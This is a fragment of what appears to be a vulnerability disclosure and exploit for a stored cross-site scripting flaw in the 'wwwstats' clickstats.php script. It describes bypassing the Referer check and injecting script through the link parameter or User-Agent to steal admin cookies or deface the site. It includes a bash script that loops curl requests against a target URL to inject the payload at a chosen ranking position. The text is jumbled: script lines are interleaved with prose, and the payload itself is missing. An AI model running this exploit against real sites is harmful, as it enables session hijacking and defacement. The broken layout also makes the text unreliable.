To bypass the first 'if', is necessary to fill the HTTP Referer field with something, and inject the link to the database by the link get parameter.
An attacker can inject using the link parameter or the useragent field a script which will steal admin's cookies, or make a deface, or anything else...
Controlling the iterations number, is possible to do the injection in the ranking position you want:
while [ 1 ]; do
Also is possible to attack by user agent: -A 'attack'
A payload can be:
#jolmos (at) isecauditors (dot) com
if [ $# -ne 4 ]
echo "Usage: $0
echo "Example: $0 http://www.victym.com/wwwstats
echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done